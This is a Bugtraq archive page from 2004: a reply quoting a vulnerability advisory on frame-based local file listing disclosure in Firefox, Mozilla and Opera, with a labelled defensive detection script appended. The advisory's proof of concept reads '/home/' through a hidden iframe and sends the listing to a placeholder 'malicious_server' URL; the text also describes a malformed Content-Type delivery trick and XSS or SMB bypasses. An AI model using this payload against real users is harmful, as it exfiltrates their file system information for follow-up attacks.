Bugtraq mailing list archives
Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:
From: Liu Die Yu <liudieyu () umbrella name>
Date: Thu, 02 Dec 2004 09:49:06 +0800
Target user doesn't need to click the OPEN button:

1. Cross-site scripting vulnerabilities can get it done (on Mozilla, an internet page can't navigate to a local page directly ... but there are ways to bypass this restriction).
2. Ask target to open an HTML file in a remote SMBFS folder - expecting him to mount -t smbfs [...] /mnt/[...] and open "/mnt/[...].html" in Mozilla :-)

Attacker can *browse* target's folders and files (file content, filename, filesize, and even the date).

==========
http://editive.com/referrer

Giovanni Delvecchio wrote:
Title: Disclosure of file system information in Mozilla Firefox and Opera Browser

Note: I don't know if it could be considered really a security problem, anyway I'll try to explain my ideas. Sorry for my bad English.

Author: Giovanni Delvecchio
Bug: Disclosure of file system information

Applications affected:
- Firefox 1.0
- Mozilla 1.7
- Opera 7.54 (*)
( maybe also previous versions )

Tested versions:
- Firefox 1.0 on Linux and Windows
- Mozilla 1.7 on Windows
- Opera 7.51,..7.54 on Linux

Note: The content of this advisory could be applied also to other browsers, I have checked just Mozilla, Firefox, Opera and Microsoft Internet Explorer. Microsoft Internet Explorer seems not to be affected.

Bug Description:
================
A problem exists in some browsers where a frame can gain access to attributes of another frame or iframe. An application of this bug could be the possibility to disclose local directory structure.

PoC:
===
------ begin code.htm -----
<html>
<body onLoad="
list_files='';
for(i=0;i<local_files.document.links.length;i++)
{list_files+=local_files.document.links.item(i);}
alert(list_files);
//send list_files to malicious_server
document.location.href='http://malicious_server/grab.php?list='+list_files;">
<iframe name="local_files" src="file:///home/" height=0 width=0></iframe>
</body>
</html>
------ end of code.htm -------

Impact:
======
A malicious server could obtain the content of /home/ directory ( or c:\Document and Setting\ for windows system ) and so know a set of usernames present on system target. Moreover, it could be possible to know if a particular program is installed on target system for a successive attack.

Anyway it cannot be exploited "directly" by a remote site, but only if the page is opened from a local path ( file://localpath/code.htm ), since the iframe "local_files" belongs to a local domain.

Note: with Internet Explorer code.htm doesn't work even in local.

Possible Remote Exploitation:
========================
Question: How could a malicious remote user exploit it ?

Answer: After the user "victim" has requested http://maliciuos_server/code.htm, if malicious_server responds with a page containing an unknown Content-Type field ( for example text/html. , note the dot ), the browser will show a dialog window with some options (open, save, cancel). Choosing "Open" to view this page, it will be downloaded and opened in local; javascript code will be executed in local context. Obviously, if the user chooses to save and afterwards opens it, the result is equal.

(*) For Opera this method of remote exploitation requires that Opera must be set as Default Application in "handler for saved files" whether the user chooses "Open" in the dialog window.

Solution:
========
No solution at the moment

Vendor notice
==============
24th November 2004: I have contacted Mozilla by security () mozilla org and Opera by its bug track page at https://bugs.opera.com/wizard/
No response from both at the moment.

Best regards,
Giovanni Delvecchio
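
A defender-side triage of the delivery path described in the advisory above, as an added example that is not part of the original posts: it flags a proxied or downloaded response whose body is HTML but whose Content-Type is not a recognised HTML type and which also frames a file: URL. The function names, the allowlist of types and the sample response are assumptions constructed for illustration.

```javascript
// Added example (not from the original posts). Names and allowlist are assumptions.
const HTML_TYPES = new Set(["text/html", "application/xhtml+xml"]);

// Constructed sample: the advisory's iframe, served with its "text/html." type.
const SAMPLE = {
  contentType: "text/html.",
  body: '<html><body><iframe name="local_files" src="file:///home/" height=0 width=0></iframe></body></html>',
};

// Media type of a Content-Type header value, lowercased, parameters dropped.
function mediaType(headerValue) {
  return String(headerValue || "").split(";")[0].trim().toLowerCase();
}

// src values of <iframe>/<frame> tags that point at file: URLs.
function localFrameSources(html) {
  const found = [];
  const srcRe = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  for (const tag of html.match(/<i?frame\b[^>]*>/gi) || []) {
    const m = srcRe.exec(tag);
    if (!m) continue;
    const src = (m[1] ?? m[2] ?? m[3]).trim();
    if (/^file:/i.test(src)) found.push(src);
  }
  return found;
}

// Flag a response only when both traits from the advisory are present.
function triageResponse(contentType, body) {
  const type = mediaType(contentType);
  const reasons = [];
  const htmlBody = /<\s*(html|body|iframe|frame|script)\b/i.test(body);
  if (htmlBody && !HTML_TYPES.has(type)) {
    reasons.push(`HTML body served as unrecognised type "${type}"`);
  }
  const frames = localFrameSources(body);
  if (frames.length > 0) {
    reasons.push(`frame loads local URL: ${frames.join(", ")}`);
  }
  return { type, frames, reasons, suspicious: reasons.length === 2 };
}

console.log(triageResponse(SAMPLE.contentType, SAMPLE.body));
```

A response that shows only one of the two traits is returned with its reason listed but is not marked suspicious, which keeps ordinary pages with remote iframes out of the alert queue.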
Current thread:
- Disclosure of file system information in Mozilla Firefox and Opera Browser: Giovanni Delvecchio (Dec 01)
- Re: Disclosure of file system information in Mozilla Firefox and Opera Browser: Liu Die Yu (Dec 02)
- <Possible follow-ups>
- RE: Disclosure of file system information in Mozilla Firefox and Opera Browser: Thor Larholm (Dec 07)